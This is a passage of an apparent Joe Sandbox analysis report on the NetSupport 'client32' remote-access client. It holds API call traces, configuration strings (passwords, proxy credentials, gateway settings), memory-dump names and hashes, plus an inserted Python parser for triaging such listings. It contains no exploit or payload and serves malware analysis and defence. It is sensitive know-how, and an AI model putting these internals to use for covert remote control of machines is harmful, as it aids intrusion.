• CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
• SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
• std::exception::exception.LIBCMT ref: 11075038
• __CxxThrowException@8.LIBCMT ref: 11075053
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
• String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
• API String ID: 703120326-1497550179
• Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
• Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
• Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
• Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• PostMessageA.USER32(000A0036,000006CF,00000007,00000000), ref: 11139C4F
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• SetWindowTextA.USER32(000A0036,00000000), ref: 11139CF7
• IsWindowVisible.USER32(000A0036), ref: 11139DBC
• GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
• IsWindowVisible.USER32(000A0036), ref: 11139DEA
• SetForegroundWindow.USER32(00000000), ref: 11139E18
• EnableWindow.USER32(000A0036,00000001), ref: 11139E27
• IsWindowVisible.USER32(000A0036), ref: 11139E78
• IsWindowVisible.USER32(000A0036), ref: 11139E85
• EnableWindow.USER32(000A0036,00000000), ref: 11139E99
• EnableWindow.USER32(000A0036,00000000), ref: 11139DFF
                                                                                                                                                      • Part of subcall function 11132120: ShowWindow.USER32(000A0036,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000001), ref: 11139EAD
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
• String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
• API String ID: 3453649892-3803836183
• Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
• Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
• Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
• Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
APIs
• wsprintfA.USER32 ref: 11030645
• PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessagePostwsprintf
• String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
• API String ID: 875889313-3431570279
• Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
• Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
• Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
• Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
• GetStockObject.GDI32(0000000D), ref: 110312E6
• GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
• InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
• String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
• API String ID: 1428277488-3745656997
• Opcode ID: 7379e38c5c1183fd42387e7de37ee182c3fc9089f1a42e7092b3b40317450af4
• Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
• Opcode Fuzzy Hash: 7379e38c5c1183fd42387e7de37ee182c3fc9089f1a42e7092b3b40317450af4
• Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• GetStockObject.GDI32(0000000D), ref: 110312E6
• GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
• InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
• _sprintf.LIBCMT ref: 11031401
• _setlocale.LIBCMT ref: 1103140B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
• String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
• API String ID: 4242130455-3745656997
• Opcode ID: 936d353a89e7de5d72b4b31bb00a29fbb2fe336fc4f16652f70a9f689e12861a
• Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
• Opcode Fuzzy Hash: 936d353a89e7de5d72b4b31bb00a29fbb2fe336fc4f16652f70a9f689e12861a
• Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
• wsprintfA.USER32 ref: 11028814
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
• GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
• wsprintfA.USER32 ref: 11028891
• CloseHandle.KERNEL32(?), ref: 110288A7
• CloseHandle.KERNEL32(?), ref: 110288B0
• LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                    • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                    • API String ID: 512045693-419896573
                                                                                                                                                    • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                                                    • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                                                                    • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                                                                    • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                                    • API String ID: 2111968516-2157635994
                                                                                                                                                    • Opcode ID: 53f6ae2d703c75e5b12f0250e08ffff585b3af6e3801b158ec4e4fee44b924f5
                                                                                                                                                    • Instruction ID: e97117949c2dce293da391cff3620a0602e251cc84d14d84b3b6cc0faceea523
                                                                                                                                                    • Opcode Fuzzy Hash: 53f6ae2d703c75e5b12f0250e08ffff585b3af6e3801b158ec4e4fee44b924f5
                                                                                                                                                    • Instruction Fuzzy Hash: 2B22B5B2A11358AFDB24CE54CC81EEAB3B9BB49304F0886D9E54D67A40D6315FC8CF51
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,1EF76653,034A7480,034A7470,?,00000000,1118368C,000000FF,?,11032002,034A7480,00000000,?,?,?), ref: 11086115
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                      • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                                                                                    • wsprintfA.USER32 ref: 110861EB
                                                                                                                                                    • wsprintfA.USER32 ref: 11086202
                                                                                                                                                    • wsprintfA.USER32 ref: 11086219
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D68
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D7B
                                                                                                                                                      • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085D8E
                                                                                                                                                      • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7572F550,?,?,11086390,?,11032002,034A7480,00000000,?,?,?), ref: 11085DA1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                    • API String ID: 4263811268-2492245516
                                                                                                                                                    • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                                                                                    • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                                                                    • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                                                                                    • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                                                                    APIs
                                                                                                                                                    • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                                                                    • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                                                                                    • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                                                                    • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                                                                                    • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
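The per-function "APIs" listings on this page (the PCIMutex function above, the NSM.LIC, PCIINV.DLL and service-query functions around it) all use one line format. What follows is an added example, not Joe Sandbox's or NetSupport's code: a small Python parser that turns those lines into records and pulls out the string-literal arguments an analyst pivots on during triage (mutex, DLL, export and service names). The line format is inferred from this page only; the sample lines are copied from the PCIMutex listing above plus one subcall line from the NSM.LIC function earlier on the page; the constant names are the Windows SDK values for those parameter positions. Joe Sandbox's argument lists can run past the declared parameter count with stack noise (the LoadLibraryA line above shows fifteen values for a one-parameter API), so only known parameter positions are decoded.

```python
"""Parser for the per-function "APIs" call listings in a Joe Sandbox report
(added example; the line format is inferred from the page, not from Joe Sandbox docs).

    • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
"""
import re
from collections import Counter

_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<parent>[0-9A-Fa-f]+):\s*)?
        (?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?          # argument list is absent for some lines
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)
_HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")

# (api, zero-based parameter index) -> {value: SDK constant name}. Only documented
# positions; values past the declared parameter count are stack noise in these reports.
_KNOWN = {
    ("OpenMutexA", 0): {0x1F0001: "MUTEX_ALL_ACCESS"},
    ("OpenSCManagerA", 2): {0xF003F: "SC_MANAGER_ALL_ACCESS"},
    ("OpenServiceA", 2): {0x4: "SERVICE_QUERY_STATUS"},
    ("LoadLibraryExA", 2): {0x2: "LOAD_LIBRARY_AS_DATAFILE"},
    ("SetLastError", 0): {0x78: "ERROR_CALL_NOT_IMPLEMENTED"},
}


def classify_arg(tok):
    """'?' -> unknown, exactly 8 hex digits -> number, anything else -> string literal.
    Caveat: an 8-character literal made only of hex digits would be misread as a number."""
    if tok == "?":
        return ("unknown", None)
    if _HEX32.match(tok):
        return ("num", int(tok, 16))
    return ("str", tok)


def parse_api_line(line):
    """One listing line -> record dict, or None for headers such as 'Strings'."""
    m = _LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [classify_arg(t.strip()) for t in raw.split(",")] if raw else [],
        "ref": int(m.group("ref"), 16),
        "parent": int(m.group("parent"), 16) if m.group("parent") else None,
    }


def parse_api_block(text):
    return [r for r in map(parse_api_line, text.splitlines()) if r is not None]


def string_args(records, top_level_only=True):
    """Distinct string-literal arguments in call order: the names worth pivoting on."""
    out = []
    for r in records:
        if top_level_only and r["parent"] is not None:
            continue
        for kind, val in r["args"]:
            if kind == "str" and val not in out:
                out.append(val)
    return out


def decode_known(records):
    """(api, ref) -> decoded constant names for the parameter positions in _KNOWN."""
    found = {}
    for r in records:
        for (api, idx), table in _KNOWN.items():
            if r["api"] == api and idx < len(r["args"]):
                kind, val = r["args"][idx]
                if kind == "num" and val in table:
                    found.setdefault((api, r["ref"]), []).append(table[val])
    return found


def api_histogram(records):
    return Counter(r["api"] for r in records)


# Copied from the PCIMutex listing on this page, plus one subcall line from the NSM.LIC function.
SAMPLE = """\
• OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
• CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
• GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
• SetLastError.KERNEL32(00000078), ref: 11030D82
• WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
• CloseHandle.KERNEL32(?), ref: 11030DC9
• FreeLibrary.KERNEL32(?), ref: 11030DD4
• CloseHandle.KERNEL32(00000000), ref: 11030DDB
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
"""

if __name__ == "__main__":
    recs = parse_api_block(SAMPLE)
    print(len(recs), "calls; strings:", string_args(recs))
    print(decode_known(recs))
```

Run over the PCIMutex block this yields the two literals PCIMutex and SetProcessDPIAware and decodes the OpenMutexA access mask as MUTEX_ALL_ACCESS, which is what you would expect of a single-instance check: open the mutex if a client is already running, otherwise create it. Feeding the service-query function's lines through the same parser decodes the OpenSCManagerA and OpenServiceA masks the same way.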
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,1EF76653,?,00000000,00000000), ref: 1102D594
                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
